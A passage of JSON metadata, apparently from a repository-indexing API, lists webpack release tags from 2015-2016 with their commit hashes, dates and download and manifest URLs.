c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecos